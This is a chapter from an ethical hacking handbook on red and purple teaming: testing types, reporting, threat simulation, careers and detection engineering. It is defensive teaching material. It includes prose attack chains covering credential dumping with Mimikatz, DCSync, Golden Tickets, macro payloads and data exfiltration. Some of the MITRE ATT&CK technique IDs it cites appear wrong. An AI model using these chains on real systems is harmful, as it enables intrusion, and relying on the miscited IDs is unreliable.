                     PART II

            Ethical Hacking

Chapter 6   Red and Purple Teams
Chapter 7   Command and Control (C2)
Chapter 8   Building a Threat Hunting Lab
Chapter 9   Introduction to Threat Hunting
This page intentionally left blank
  Red and Purple Teams
                                                                             CHAPTER

                                                                                              6
  In this chapter, we cover the following topics:
      • Introduction to red teams
      • Components of a red team
      • Threat simulation
      • Making money with red teaming
      • Purple teams

Although we covered what an ethical hacker is in Chapter 1, it’s important to understand
what the role of an ethical hacker is in the context of the security ecosystem. For both
corporate security and consulting, ethical hackers help provide an adversarial mindset to
security to help organizations understand what an attacker would see, what they could
do, and what the impact would be. This helps organizations grow both tactically, by fix-
ing specific issues, and strategically, by changing the way they operate and do business.

Introduction to Red Teams
The concept of red teaming originated in the military. Competitive training exercises,
where one team takes the role of an attacker (a red team) while another part defends
(a blue team), let you see how well your defenses hold up in practice. In the business
world, red teams attack cybersecurity defenses, including those that apply to people,
processes, and technology. The ethical hacker can take the role of a friendly adversary
to allow organizations to practically evaluate their defensive measures outside of a true
cyberattack. This allows defenders to practice response and evaluate detection before they
are attacked by a true threat actor.
   Organizations at different maturity levels require different things from their red team.
As security at an organization becomes more mature, the role of the red team changes,
and the impact to the business as a whole changes as well. In this section, we will look
into what a red team is, the various roles that a red team might have, and discuss what
role each stage plays in an organization’s security growth.
   As a security program starts, the first phase is typically to try to implement network
controls like firewalls, proxies, and network intrusion detection systems. Once the basics
are in place, then patch management would be deployed in order to make sure all systems
are patched. How do you know these things are working? One way is through vulner-
ability scanning. Vulnerability scanning will help determine what systems can be seen

Gray Hat Hacking: The Ethical Hacker’s Handbook

                                                        Adversarial           LOB
                                                    Simulation/Emulation
                                                                           IR Training

                                                                            Detection
                                                                           Engineering
                                                  Purple Team
                                                                       Monitoring and
                                                                      Incident Response

                                                                      Security Controls
                                          Pentest
                                                                  Configuration Management

                                                                  Vulnerability Management

                            Vulnerability
                                                                      Patch Management
                            Scanning

                                                                Network Segmentation/Controls

Figure 6-1 Red team maturity model

              on the network from a scanner’s vantage point, what services are exposed, and potential
              vulnerabilities. Figure 6-1 shows how each layer of security builds on the next as well as
              what types of testing help focus on those areas.
                 As vulnerability scanning increases within an organization, the false positive rate
              increases, and the organization moves to validated vulnerability scanning along with add-
              ing in authenticated scans to the vulnerability scanning. Once the organization has the
              basics for a vulnerability management program, it is important to look at the gaps for
              critical areas of the business.
                 Once red team activities become routine, some responsibilities may be given to other
              areas of an organization, and the red team may evolve. In the end, the more sophisti-
              cated red teams have threat emulation and “purple team” capabilities (discussed later in
              the chapter) to help drive changes within their organizations in more than just security
              controls, but how the organization does business. They may retain other functions as
              well, but the top level of capabilities will define the overall capability level, with the most
              mature organizations being able to provide value to lines of business (LOBs) and training
              opportunities for incident responders before an actual compromise.

              Vulnerability Scanning
              Vulnerability scanning is the act of running tooling against an environment in an attempt
              to find security vulnerabilities. Vulnerability scanning is a breadth activity, in that it tries
              to test as many assets as possible to determine if there are missing patches, but it can only
              test for known issues that have tests written for them. On the other hand, penetration
                                                                                Chapter 6: Red and Purple Teams
testing goes deeply into assets to try to uncover new vulnerabilities and impacts within a
small subset of systems.
   There are generally two types of vulnerability scanning: authenticated and unauthen-
ticated. Most organizations start with unauthenticated first, because it is the easiest to
roll out. The downside of this is that unauthenticated scans typically make best-effort
guesses to determine whether or not a service is vulnerable, so it has a high rate of false
positives (the scanner shows the service as being vulnerable when it’s not) or false nega-
tives (the scanner shows the service as being not vulnerable when it is vulnerable).

                                                                                                                  PART II
   Once an organization is performing vulnerability scanning, it has to have a path to
remediation. This is a combination of patch management and vulnerability remediation
processes. Once these processes are in place, it will frequently become apparent that there
are false positives, and the organization would move to validated vulnerability scanning to
reduce false positives. Validated vulnerability scans authenticate to the system to directly
query software versions, so they can act as both version identification for vulnerabilities as
well as validation that patches have been applied consistently.
   In addition to more reliable scan results, authenticated scanning can further enhance
asset and inventory management. Identifying installed software versions, software that
may have been installed that is not supported or is against policy, and other system prop-
erties can be gathered through this process to add into other management and visibility
capabilities of an organization. Identifying systems by more than just an IP address may
also allow more specific asset vulnerability tracking for hosts that use DHCP as well,
meaning that being able to track vulnerability trends for an asset over time is more reliable.
   A working vulnerability management program is the foundation for the rest of the
activities in red teaming. Without vulnerability management, penetration testing is only
useful for compliance purposes, and even then, the results will typically not be favorable.

Validated Vulnerability Scanning
Once a vulnerability management process is in place, organizations may want to be able
to validate that the vulnerabilities found are exploitable and that there are no additional
mitigating controls in place that would stop an intrusion. Validated vulnerability scan-
ning fills this gap by taking the results from vulnerability scans and performing manual
validation of the results by attempting to exploit the vulnerability. Once the vulnerability
is exploited, however, the testing typically stops, so further exploitation possibilities are
not explored.
    By exploiting the servers and services, the tester removes all doubt about whether a
system is vulnerable. Many folks get their start in penetration testing by doing this type
of testing because the scope is limited, the goals are specific, and there tends to be a lot
of repetition. By building up their skillsets of researching a vulnerability, building an
attack, and executing an exploit, testers can refine their attack skills to prepare for more
advanced penetration testing.
    Not all organizations have a separate function for performing validated vulnerability
scanning. Some will just rely on authenticated scans to determine vulnerability and then
force remediation based on that alone. As organizations grow, though, this frequently
becomes an aspect of a program, even if it isn’t long lived.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Penetration Testing
              Penetration testing explores security vulnerabilities in sequence through building attack
              trees. Attack trees show a series of events together and demonstrate the outcome in such
              a way that organizations can contextualize what the vulnerabilities mean in their environ-
              ment. Although a single vulnerability may have a low rating according to the vulnerabil-
              ity scanner’s Common Vulnerability Scoring System (CVSS) score, by combining it with
              other vulnerabilities, an attacker may be able to achieve a much bigger impact. These
              attack trees provide the security team an understanding of how the vulnerabilities will
              be impacted by controls, while the lines of business will be able to see how these vulner-
              abilities impact the company from a data and process perspective.

                                 NOTE CVSSv3.1 is the latest version of the CVSS specification. While many
                                 vulnerabilities come with a CVSS score, sometimes they are wrong, and so
                                 understanding how to calculate them yourself will be particularly useful.
                                 You can find a calculator online at https://www.first.org/cvss/calculator/3.1.

                 Most penetration testers specialize in a specific area: network, application, physical,
              device, or cloud testing. That does not mean that is the only type of testing that they do,
              because attacks will frequently cross the boundaries of some of these components.
                 Penetration testing is governed by a statement of work (SOW) that will help define
              the parameters of the testing. SOWs vary greatly based on the goals of testing. For some
              organizations, the goal is to find everything that might be wrong within a certain area,
              while others may have specific targets that they want the tester to try to compromise,
              which is referred to as goal-oriented penetration testing.
                 Goal-oriented penetration testing typically sets goals and a timeframe to explore a
              threat model. The customer will typically specify the types of things they are worried
              about, such as someone ransoming an environment, stealing corporate secrets, com-
              promising sensitive environments, or being able to impact SCADA environments. The
              tester will start from a position either on or off the network and then attempt to reach
              the target environment by moving through the network, elevating privileges, and moving
              further until they reach the target.
                 Penetration testing helps provide better insights into the impact of vulnerabilities on
              the network. By building attack chains, a tester can show how combinations of vulner-
              abilities can be put together to achieve results. This way, practical impacts of vulnerabili-
              ties can be determined and compensating controls can be evaluated for effectiveness. In
              short, many organizations believe that certain controls will catch malicious activity and
              that certain vulnerabilities may not be exploitable; however, during a penetration test,
              the tester is evaluating what an attacker can do. A proper penetration test report will
              not contain “potential findings.” Instead, it will only include findings that are provable
              and documented through write-ups, recommendations, and screenshots. Understanding
              these practical impacts helps an organization to prioritize and plan security changes that
              will ultimate help make the organization more secure.
                                                                                Chapter 6: Red and Purple Teams
Network Penetration Testing
Network testing deals with operating systems, services, domains, and overall network
topologies. This is what most people think of when they hear the phrase “penetration
testing.” The goals of these tests are typically to look at a network environment and
determine if someone can get into it, to determine possible attack paths an attacker may
take, once inside, and to determine what the impact will be. The tester may be limited to
a specific area of the network, such as only the perimeter of a network, or they could be
given access inside and be limited to a specific area of the network, like a PCI environ-

                                                                                                                  PART II
ment or customer environment.
   Network testing examines the security of an enterprise through the lens of network
infrastructure, protocols, communication, operating systems, and other network-
connected systems. It should evaluate the effectiveness of patch and vulnerability man-
agement, network segmentation, configuration management, and host and network
control efficacy.

Application Penetration Testing
Application testing is scoped to an application, a component of an application, or a small
set of applications. This testing is designed to dig deep into an application and determine
software weaknesses and attack paths within the software itself. Application testers may
deal with web applications, compiled and installed applications (sometimes called “fat”
applications), mobile applications, and even application programming interfaces (APIs).
Application testing typically doesn’t cross the boundaries to looking at post-exploitation
in an operating system.
   Application testing may be included with a dynamic application security testing
(DAST) or static application security testing (SAST) program that is incorporated as part
of a software development life cycle (SDLC) process. In this circumstance, applications
may be tested at fixed intervals, as part of specific versioning releases, or even as part of
automated processes when anyone commits a code change.
   Application testing provides an organization with an understanding of how the secu-
rity of an application impacts the posture of an organization, which can lead to more
secure products and eliminate fixes later in the SDLC process that may be more costly to
fix. It also helps with assessing the efficacy of controls, including business controls in the
application as well as typical controls such as web application firewalls (WAFs) and other
web server security controls.

Physical Penetration Testing
Physical testing looks at the security of physical aspects of an environment, including
doors, windows, locks, and other controls designed to protect physical access to an area.
This may include activities like picking or bypassing locks, tailgating into environments,
bypassing sensors, bypassing alarms, and other methods of gaining access to a resource.
Even aspects like getting into automatic teller machines (ATMs) would fall into physical
testing, as the locks, alarms, and more would need to be bypassed before any other of the
systems could be evaluated.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 Device testing is becoming more popular, as you’ll see in Gray Hat Hacking’s IoT
              hacking chapters in Part IV of the book. Device testing looks at a combination of the
              physical aspects of devices, including physical interfaces, and firmware and application
              exploitation, with the goal of compromising the device itself. This frequently includes
              SCADA networks and other network-attached hardware as well.
                 Physical testing may be coordinated between network security and physical security
              teams to help understand how physical controls might impact the security posture of
              an organization. This could be everything from datacenter security, to how easy it is to
              get into a restricted area, to leaving malicious devices behind in an area connected to
              the network. These insights will help provide both network and physical security teams
              additional recommendations for how to make physical attacks less impactful. This also
              highlights that no matter how secure your network is, if an attacker can walk away with
              your server without someone stopping them, your data isn’t secure.

              Cloud Penetration Testing
              Cloud testing is a new discipline that, as of this writing, is not incredibly well developed.
              The goal of cloud testing is to identify cloud-related vulnerabilities and compromise
              cloud resources. This is typically done by finding weaknesses in provisioning, supply
              chain, identity and access (IAM) management, or key management aspects of the cloud.
              Possible targets could be cloud storage, cloud services, servers in the cloud, and cloud
              management access as a whole.
                 The types of findings that come from cloud testing range from files that are available to
              the Internet to configuration weaknesses that could allow privilege escalation or account
              takeover. As new cloud services are deployed, they may integrate with other cloud services,
              and cloud testing can help identify security weaknesses in Security Assertion Markup
              Language (SAML) integrations and other tools that enable single sign-on (SSO), which
              individually may not present risk, but in combination can lead to compromise.
                 Cloud testing’s SOWs are even more difficult because, in addition to what the com-
              pany wants, the various cloud providers have their own rules of engagement (ROE) that
              govern their services. Therefore, make sure you are aware of all the components you are
              testing and the ROE of the cloud provider before you start testing. Some of these pro-
              viders may also have bug bounty programs, as mentioned in Chapter 1, so as you find
              weaknesses, you may have multiple avenues to report them.
                 Many organizations move to the cloud to help eliminate other types of risk, but
              cloud services are frequently difficult to configure securely and have other avenues for
              misconfigurations and security weaknesses. Without testing these controls and creating
              processes, policies, and frameworks for maintaining the security for cloud services, the
              business may be introducing risk that isn’t categorized and evaluated by existing tools
              and policies.

              Testing Process
              Testing typically begins with a kick-off call, where the SOW and ROE are discussed with
              the client. Testing timeframes are set and any other concerns or topics related to testing
              are addressed. Once all of this information is agreed upon, testing dates are set and the
              tester can begin planning the engagement. Any changes to the SOW or ROE need to
                                                                                 Chapter 6: Red and Purple Teams
be documented in writing to make sure there are no miscommunications. This process
should be documented as part of team rules and processes.
   Regardless of what type of testing you are doing, there is a general pattern to pen-
etration testing. Testing begins with recon, which includes researching IP spaces, DNS
names, and other aspects for network testing, but could include many other items for
other testing types. For instance, for physical testing, looking at arial recon photos online
or pictures posted online from events at a location for additional information may be
part of your recon activities.

                                                                                                                   PART II
   From there, discovery, scanning, exploitation, and post-exploitation are performed.
The details of these are different based on each different type of penetration testing;
however, they are cyclical. After new discoveries are made, additional recon may kick off
additional steps to determine the next set of steps. Entire books have been written about
this process, so we will focus on the business process more than the technical processes
in this chapter.

             NOTE The attack life cycle is simplified here. There are execution standards
             like PTES (http://www.pentest-standard.org/index.php/Main_Page) that can
             help an organization define testing terms, methodologies, and practices for
             testers to ensure consistent testing is performed and the most can be gotten
             from the testing itself, through scoping all the way to the reporting process.

   Once testing has completed, the reporting phase begins. Reporting should contain an
executive summary designed to give nontechnical readers an overview of what the report
means to the organization. This would include high-level aspects such as what goals the
tester reached, the overall impact to the organization, and a general strategy for remedia-
tion and improving the posture of the organization.
   An attack narrative helps lay out the steps that were taken during testing and may
include technical details that technical managers will be able to understand about how
an attack unfolded. This may include attack maps laying out the attack chain, the steps
taken to reach the objectives of testing, controls that were encountered, and any bypasses
that were discovered. The narrative is designed to tell the reader what happened and what
the impact was as well as give another tester an understanding of how to re-create that
test if they are assigned it again.
   The findings section of a report lists the issues that were found during testing and
typically includes an impact rating, a description of the finding, the steps to re-create it,
screenshots to act as proof, and a remediation suggestion. The impact rating may be listed
as risk in some reports, but because some of the elements of risk can’t be calculated, it is in
reality the perceived impact to the environment. A good report will include a description
of how these impacts are calculated so that the reader can understand what the ratings
mean in context. These findings should have assets or areas of the environment impacted
by them and should be limited to a single issue. Issues that require multiple individuals
to fix them help the business less because they can’t be easily assigned to a group to fix.
   Reports may have other elements, depending on what else the customer asks for, such
as information about the dates, SOW, ROE, limitations of testing, any scanning results,
and other aspects that the testing team incorporates into all of their reports. These reports
Gray Hat Hacking: The Ethical Hacker’s Handbook
              should be clear, concise, and understandable by the target audience. Where necessary,
              additional links may be provided to help the reader understand how to fix issues. This
              report is the real value in testing, and while the testing itself is helpful, without a quality
              report, getting traction to fix issues may be difficult, and it will detract from the quality
              of the testing.

              Threat Simulation and Emulation
              In Chapter 1, we introduced the MITRE ATT&CK framework, which helps categorize
              the various stages of an attack and gives a way to describe the tactics, techniques, and pro-
              cedures (TTPs) that attackers use. Threat simulation and emulation put together these
              attack trees using known TTPs to help identify weaknesses in controls, policies, practices,
              and people within an environment. These tests frequently start with a “what if ” scenario
              that involves a threat actor, set TTPs, and a goal. It helps the organization understand
              what an attacker may see, what the defense teams may see, and what controls, if any, will
              interfere with attackers reaching their goals.
                 By mapping the activities to TTPs, testers can help provide a blue team with mappings
              of techniques that work in the environment, don’t work in the environment, and allow
              those teams to map these techniques to controls and data sources that detect or don’t
              detect certain activity. These can feed into additional purple team activity at a later point.
                 Threat simulation is not just one thing, which is one of the reasons that it is higher
              up the maturity model. Threat simulations can include a blend of phishing, physical,
              application, network, and hardware hacking. Threat simulation is similar to penetration
              testing, but the key differentiator is that the goal of testing is not simply the “crown jew-
              els” of the organization, but instead to test the people, processes, and technology of an
              organization based on attack techniques.
                 Threat simulations also take more planning than penetration tests. The TTPs that
              will be used are frequently decided up front for an exercise, and tooling may be created
              that specifically exercises certain TTPs, either to determine their efficacy or because their
              efficacy is known to be effective. After an exercise has started, some of the TTPs may
              not work or may experience problems. Testers may have to adapt or change TTPs even
              though others were planned due to time constraints or controls that were unanticipated.
              For instance, if utilizing WinRM for lateral movement is a key TTP that was planned,
              the tester may have to switch to WMI instead if WinRM is disabled across the enterprise.

                                 NOTE MITRE Attack Navigator (https://mitre-attack.github.io/attack-
                                 navigator/) is an excellent resource for mapping TTPs for an exercise. It has
                                 the ability to annotate TTPs as well as highlight the ones used for an exercise
                                 and export them to JSON for sharing with other team members. In addition,
                                 various layers can be laid on top of others to show the breadth of TTPs
                                 exercised over various threat simulation exercises to focus on what works
                                 and what has yet to be tested. Attack Navigator also has links to the tactic
                                 and technique for each TTP so that the reader can view more about them
                                 based on what has been mapped into an exercise.
                                                                                  Chapter 6: Red and Purple Teams
    One example of a threat simulation would begin with someone tailgating into an
office building by following an employee through an open door and implanting a physi-
cal hardware device on the network (T1200). From there, the tester might use Responder
to do LLMNR poisoning (T1577.001) to gather credentials. From there, the attacker
may crack the credential and then use WinRM (T1021.006) to move to other systems
until the tester finds a system with elevated credentials. The testers would then dump cre-
dentials from LSASS (T1003.001) using Mimikatz and capture the plaintext password
for a Domain Administrator account. With those credentials, the testers can execute a

                                                                                                                    PART II
DCSync (T1003.006) against the domain controller to retrieve all of the credentials for
the domain and create a Golden Ticket (T1588.001). That ticket can be used to imper-
sonate a user that has access to a sensitive web application and then access that applica-
tion through a compromised system by deploying VNC (T1021.005) to a target. Once
logged in to the application the testers could steal and export a spreadsheet that is zipped
with PowerShell (T1005.003) and transferred back to the hardware device and send it
back to the tester over the cellular network (T1008).
    Threat emulation is similar to threat simulation in that it focuses on attack trees and
reaching goals, but the primary distinguisher for threat emulation is that emulation is
performing the same TTPs as actual threat actors as opposed to simulations, which are
just focused on TTPs or goals. Emulating specific TTPs, especially custom software, can
be difficult, and it typically requires a close relationship with a threat intelligence team
that can help research and define what TTPs a specific threat actor uses. Typically for
threat emulation, a tester will start out by doing recon on threat actors that will poten-
tially target a customer organization. This may be done through a tester’s own research
or come from a threat intelligence organization that can help provide information on the
targets for common threat actors. Once a threat actor is chosen, the tester will typically
receive a list of TTPs and indicators of compromise (IOCs). The TTPs will detail what is
known about how a threat actor performs various steps, from targeting through exfiltra-
tion. The IOCs will typically include hashes of malware that was used.
    During a threat emulation exercise, a tester will adapt the knowledge to the target and
help identify types of things that a threat actor would be going after, such as specific data,
specific impact, or specific access. Once this is identified as a possible target, the tester
will take the TTPs that are known and try to map them to probable attack chains. Many
times, there are steps that are unknown about how a threat actor works, so the tester will
fill those in with likely TTPs that make sense in context.
    Next, the tester would look and see what information about IOCs can be found. If
malware is out there, additional analysis may be done through reversing .NET assemblies,
basic reversing of binaries, or write-ups of how the malware behaves. When possible, the
tester can create or modify tools to work similarly to what the known malware does so
that the testing is as realistic as possible. Adding these elements to the attack tree will help
ensure that the emulation is as close as possible to the actual attacker.

             CAUTION Obtaining malware samples and analyzing them can be dangerous.
             If you are unfamiliar with how to analyze these types of samples safely,
             check Chapters 4 and 5 in this book and research how to set up a safe analysis
             environment. Not doing so could lead to you being compromised by a real
             threat actor and would make for a very bad day.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                  One example might be APT33, otherwise known as Elfin. This a suspected Iranian
              group that has targeted aviation and energy sectors. A good place to start doing some
              research is on the MITRE ATT&CK site at https://attack.mitre.org/groups/G0064/.
              After reviewing the information, you might put together an attack tree that contains a
              local flow of techniques until getting access to file server shares that contain the informa-
              tion at your organization that might be a target.
                  Looking at tooling, we see that Ruler and Empire are both present, so a valid attack
              tree might begin with password spraying (T1110.003) using Ruler (S0358) against
              Outlook Web Access (T1078.004) sites that are Internet facing. After finding a valid
              account using this technique, the tester might decide to use PowerShell Empire (S0363)
              for command and control (C2) using HTTPS (T1071.001). To deliver the payload,
              the tester might decide to build a Trojaned Microsoft Word document (T1024.002)
              with a malicious macro written in VBA (T1059.005) that triggers a PowerShell pay-
              load (T1059.001). Once this is established, the tester might create an AutoIt (S1029)
              executable that can be placed in the Run keys in the Registry to start when a user logs in
              (T1547.001). This AutoIt binary might use Base64-encoded (T1132.001) PowerShell
              payloads for persistence.
                  Once the tester gets in, they might use Empire to perform privilege escalation to bypass
              UAC and run Mimikatz (T1003.001) to gather credentials and then move laterally using
              the captured credentials (T1078) to other systems. Using the Net command (S0039), the
              tester can identify users that might give elevated access and then continue to use Empire
              to move laterally and dump credentials until they find the target data. Once the target
              data is found, the tester might use WinRAR (T1560.001) to compress and encrypt the
              data and send it to a tester-controlled FTP server (T1048.003) for exfiltration.
                  After executing a threat simulation or emulation, the tester would typically map out
              all of the TTPs and identify the IOCs of the tools used and the binaries that were run
              on systems and then turn those over to the defense team (blue team) to try to determine
              what was seen, what was missed, and what was seen but not acted on. These results
              would help an organization understand how this threat actor would have impacted the
              organization and which controls would be expected to catch some of the material. The
              biggest takeaway is what TTPs need to be detected to help proactively discover and block
              these threat actors so that the organization stays ahead of them.
                  The downside of these exercises is they typically require a lot of additional research,
              programming, and planning. Because of this, doing these tests on a regular basis is very
              difficult, unless you have a big team that can be doing research and supporting other
              testers. These tests do, however, give the most realistic understanding of what a specific
              threat actor would look like in your environment, how you might fare from a defense
              and response standpoint against specific TTPs, and where you need to improve the orga-
              nizational security posture to detect and prevent that threat actor from achieving their
              goals in your network.

              Purple Team
              Detection engineering is the process of building detections around various TTPs to help
              improve detection and response. In a purple team relationship, this could begin with
              the blue team creating a detection and then the red team working to test and refine
                                                                                Chapter 6: Red and Purple Teams
that detection. It may also be the result of log review and alert refinement after a threat
simulation or emulation exercise. The purple team can be used to help create, refine,
and test detections, resulting in more opportunities for the organization to catch attack-
ers earlier in the attack tree.
   Purple teaming can also be used as part of response efforts to emerging threats. This
will provide the organization with a deeper understanding of how an emerging threat
works as well as lead to potential detections for them in response to a 0-day proof of
concept (POC) being released and any news items the organization needs to respond to.

                                                                                                                  PART II
We will be looking deeper at purple teams later in this chapter.

Making Money with Red Teaming
For most ethical hackers, in addition to enjoying their job, making money is their pri-
mary goal. We already talked a bit about bug bounties in Chapter 1, so we’re going to
focus on more traditional ways to make money with red teaming. The two primary ways
are through corporate red teaming, where you work for a company as part of an internal
red team, and by joining a consultancy and performing consulting services for companies
that either can’t afford their own red team or are looking for an independent assessment
of their company’s security posture.
   Both options have their strong and weak points, and many testers will do both over
the course of their career.

Corporate Red Teaming
Corporate red teaming is, just as it sounds, when a tester works for a company and
spends time testing that company’s assets. The primary benefits of corporate red teaming
are that you will get to spend a lot of time learning your company inside and out and
you will be able to more quickly provide value across technologies, lines of business, and
even policies and procedures. By focusing just on improving the security posture of your
organization, you can be part of the team responsible for improving the organization’s
security posture and preparing the organization for attack. In addition, you have the abil-
ity to directly improve the ability to detect and respond.
   Having time to dig deeper into technologies also means you might have time to become
an expert on certain technologies, technology stacks, or business processes that map well
to other companies. One example might be if your company does a lot with containers
like containerd, Kubernetes, or Docker, then you might have time to dig deeper into these
technologies and how they are deployed securely, thus becoming an expert.
   The downside of this is that most organizations have a fairly static security stack, and
while new technologies are introduced from time to time, a lot of the efforts will be
around fixing detections and hardening the same things, giving you less exposure to a
breadth of products and security approaches. Because of this, some knowledge may not
be immediately portable to other companies, and if you are stuck working on specific
technologies, then your other skills may become stale.
   Most of the corporate red team jobs come with significantly less travel than consult-
ing, which is another benefit if you don’t like to travel. Corporate red team jobs will likely
have some travel associated with it, but many companies are allowing more red teams to
Gray Hat Hacking: The Ethical Hacker’s Handbook
              work remotely, so you may be working from home the majority of the time, with occa-
              sional trips into the office. Onsite testing for certain technologies will still have to be in
              a specific location, but for most organizations this is not very frequent.

              Consultant Red Teaming
              Consultant red teams are usually part of broader consulting groups. These teams focus
              on offensive testing, which may include validated vulnerability scanning, penetration
              testing, and threat simulation. There are some organizations that do threat emulation;
              however, they are much more rare, and if a company needs this level of engagement, it
              will typically already be building its own teams.
                 Consulting typically involves working with a different company every week to month
              to help it answer a question about its network. These questions range from “Am I com-
              pliant?” to “What would an attacker be able to do on my network?” These assessments
              are typically scoped based on time.
                 The plus side of this type of testing is that you will get to see new technologies and a
              different environment every few weeks. You will spend a lot of time becoming comfort-
              able in new networks, determining how to navigate those networks, and reaching target
              goals. You will get to see different technology stacks, including antivirus, intrusion detec-
              tion systems, endpoint detection and response systems, and more. Figuring out new ways
              to evade and bypass these systems feels a lot more like playing a game.
                 The downside of these types of engagements is that most organizations that have
              testing done by consultancies are less mature, and many testers find themselves getting
              into patterns where they can compromise a lot of organizations the same way. They
              may become comfortable with certain techniques and not be enticed to grow skillsets
              since the ones they already have work most of the time. This can cause individuals to
              become stale.
                 As a result, good consultants will be constantly pushing themselves to learn new tech-
              niques and incorporate them during tests, doing their own security research, and more,
              to make sure their skillsets stay fresh. This may be done on company time, or it may be
              done on personal time.
                 Frequently, consultancies don’t have set workdays; they have deadlines to get tasks
              done, and testers work however long it takes to meet those deadlines. This may mean
              some weeks require 80 or more hours of work, and some you may work for 20 hours and
              have 20 hours for research. Some organizations will give bonuses based on the amount of
              testing you deliver; therefore, to maximize income, testers may work more hours as well
              as try to figure out techniques to work smarter in order to make significantly more than
              in corporate jobs.
                 These types of jobs typically are heavier in travel, with little to no notice. As a result,
              sometimes it’s hard to plan family events very far in advance, and it’s not uncommon
              for consultants to wish their family members “Happy Birthday” over Zoom calls from a
              hotel room in another city. This type of travel will frequently burn testers out, and they
              may go to a corporate job for some time and then either settle into a corporate position
              or come back to consulting for a time until they need additional stability.
                                                                                    Chapter 6: Red and Purple Teams
Purple Team Basics
Purple teaming is the intersection between the red and blue teams. In reality, there is
not a single blue team, just as there are other teams that contribute to the success of red
teams. Frequently, many teams make up a purple team, including the threat intelligence,
incident response, forensics, detection engineering, hunt, red, and leadership teams.
These teams work together to solve problems and help increase the security posture of
an organization.

                                                                                                                      PART II
Purple Team Skills
What purple teams have the ability to focus on partially depends on the maturity of the
individual components. For instance, without good threat intelligence, it is difficult to
know what threat actors to be focusing on without significant research. It also depends
on the quality of controls, logging and monitoring, the ability to process that data, and
the overall knowledge and understanding of the teams. Frequently, purple teams evolve,
where they begin focusing on an area that is easy to find, like indicators of compromise,
and grow until they can focus on TTPs.
   David J. Bianco created the Pyramid of Pain, shown in Figure 6-2, to describe the vari-
ous levels at which defensive teams can impact an attacker. At the bottom level are hash
values, where by simply changing a hash value, the attacker can evade detection. At the
top are TTPs, where an attacker would have to change how they work, the tools they use,
and possibly even the goals they are trying to achieve. Most organizations’ threat intel-
ligence focuses initially on the bottom three levels, which are the IOCs that are readily
available through threat intelligence feeds. These are frequently available to defense tools
as well, so if a hacker comes in from the same place using the same IPs, hostnames, or
executables, it will be fairly easy to block them.
   Where the purple teams start to become effective is at the network and host artifacts
level, and going up from there. The network and host artifacts level can include patterns
of URIs and the use of specific ports or protocols for communication. These are things

Figure 6-2
                                                    • Tough!
Pyramid                                 TTPs
of Pain by
David J. Bianco                         Tools          • Challenging
(https://bit.ly/
PyramidOfPain)                       Network/
                                                           • Annoying
                                    Host Artifacts

                                    Domain Names               • Simple

                                     IP Addresses                  • Easy

                                     Hash Values                        • Trivial
Gray Hat Hacking: The Ethical Hacker’s Handbook
              that red teams can frequently re-create fairly easily to look at what is being logged, and
              then teams can find what the various components are logging and work to create better
              alerts through surfacing these logs as an event. While changing a port number or using a
              different URI scheme isn’t difficult, it requires a lot more effort than just recompiling a
              binary or setting up a new IP; therefore, it is more disruptive to an attacker, meaning they
              will have to try harder to evade detection in the network.
                  As the teams build up skill and processes, they may move to testing tools and docu-
              menting what tools look like on the network. Tools are an easy focus because they are
              readily available, and frequently there is a lot of information about how they are used.
              Also, they don’t necessarily require a ton of research, but they do have a learning curve.
              So if you know an attacker is using PowerShell Empire, then running it on the network
              to look at what it leaves behind, what it looks like, and the ways to potentially detect it
              is more difficult than just looking at logs. However, it doesn’t focus on how the tool is
              working; instead, it focuses on what it is doing.
                  When teams work with individual TTPs, they have the ability to be extremely disrup-
              tive to attackers. For instance, a defender who understands the relationship between a
              file copy with SMB, a DCOM call to WMI, and a process execution from WMIPrvSE is
              more able to stop an attack using these components. Individually, these may mean noth-
              ing. Together, they are high fidelity indicators of a single attack using WMI to perform
              lateral movement, and are behavior based and not tool based. These are much more
              difficult to understand and execute specifically, meaning that the red team has to have
              the capability to formulate multiple ways of performing this task to get higher-fidelity
              logging, and the defenders have to understand the systems enough to be able to track this
              activity. The detection engineering folks also have to be sophisticated enough to correlate
              these activities, and if the goal is to build corresponding defenses, then the client and
              server owners and controls owners need to be sophisticated enough to be able to block or
              mitigate these types of activities, if possible.

              Purple Team Activities
              Purple teams exist to perform collaborative activities that improve the security posture
              of an organization. This could include just about anything, from joint reporting on red
              team engagements to building controls. Because of this, there is no one thing that a
              purple team does; however, there are some commonalities in things that purple teams are
              uniquely positioned for.

              Emerging Threat Research
              Emerging threat research takes into account multiple areas of a purple team. The primary
              contributors are threat intelligence, red team, hunt teams, and incident response. These
              teams will work together to identify an emerging threat, such as a 0-day vulnerability
              that was published, new information about a technique being deployed in a common
              malware family, or a recent set of published research. The threat intelligence team will
              identify as much information as possible about this threat and then work with the red
              team and hunt teams to try to determine if it would impact the organization.
                                                                                Chapter 6: Red and Purple Teams
   An example of this would be the Microsoft Exchange vulnerabilities disclosed by
Microsoft in March of 2021.1 Limited information was exposed about these vulnerabili-
ties besides the initial disclosure, but if threat intelligence teams were watching, there was
a POC briefly published on GitHub on March 10 that had working code.2 This code
could have been downloaded and passed to a red team, which could test it and determine
whether it works, whether patching was successful, and what privilege level it gave.
   From there, the hunt teams could evaluate the logs it left behind and then identify if
it had been executed by anyone else against the organization. As patches rolled out, the

                                                                                                                  PART II
red team could test again for remediation, and the hunt teams could evaluate logging
with the patch in place to help document what it would look like if the attack occurred
against a patched system.
   Performing this type of activity would have put the organization ahead of the curve for
the attacks from various threat actors that followed the POC.

Detection Engineering
Detection engineering is the process of building detections for different types of events.
It can exist outside the context of purple teams; however, purple teams make it drastically
more impactful. By providing relevance, context, and applicability to a specific environ-
ment, purple teams can tailor detections to your environment so you aren’t left with
only vendor-supplied content, which may be overly noisy or not take into consideration
multiple sources that can be combined into higher-fidelity alerts.
    A good example of this is a situation where threat intelligence has found that multiple
threat actors are using Cobalt Strike for C2 and are gathering credentials with Mimikatz.
The red team can run this combination of tools on a target host and then work with the
hunt team to see what artifacts are created.
    Another example would be an EDR solution logging an LSASS access from the pro-
cess notmalware.exe and the local AV agent logging a connection to the proxy from
notmalware.exe. By combining those two components together, the team discovers that
there are fewer false positives, so they give the information to the detection engineer-
ing team to build a combination alert based on these two factors to allow the first-line
defenders to be alerted when this combination occurs.
    Further testing by the red team indicates that the alert doesn’t fire when using Mimi-
katz over Cobalt Strike’s SMB beacon. The red team shares that SMB beacons use named
pipes for communication, but there aren’t currently tools deployed that log named pipes.
The client services team works with the defenders to deploy Sysmon and configure named
pipe creation logging. When the red team runs their tests again, there is now a correlation
between hosts that have created named pipes in the last hour and are accessing LSASS.
